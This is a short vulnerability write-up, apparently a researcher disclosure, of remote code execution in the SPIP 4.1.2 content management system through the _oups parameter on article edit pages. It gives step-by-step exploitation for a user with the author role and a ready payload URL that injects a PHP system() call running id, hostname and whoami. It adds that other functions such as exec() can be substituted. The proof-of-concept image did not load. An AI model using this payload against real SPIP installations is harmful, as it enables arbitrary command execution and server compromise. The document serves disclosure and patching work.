Try   HackMD

Remote Code Execution on SPIP 4.1.2

By Abyss Watcher & SpawnZii

Local environment

Parano mode enabled, default configuration.

Requirements

  • A user account with author role.
  • An article to edit.

Vulnerable code

https://github.com/spip/SPIP/blob/master/prive/formulaires/editer_liens.php#L133 : _oups GET parameter, on edit_article pages.

Exploitation

  • Login at http://your_host/spip.php?page=login.

  • If you do not have an article created, you will have to create one at http://your_host/ecrire/?exec=article_edit&new=oui. Note your article id.

  • On the following url, change the parameter id_article by the id of the article you just created.
    http://your_host/ecrire/?exec=article&id_article=ID_OF_YOUR_ARTICLE&_oups=TzoxOiJBIjoxOntzOjE6ImEiO3M6MzoiUG9DIjt9'"><?php system('id;hostname;whoami');?>

  • Note : You can also change the php function by another, like phpinfo(),exec()

  • You can now hit enter and see the result of the command in the response.

Proof Of Concept

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →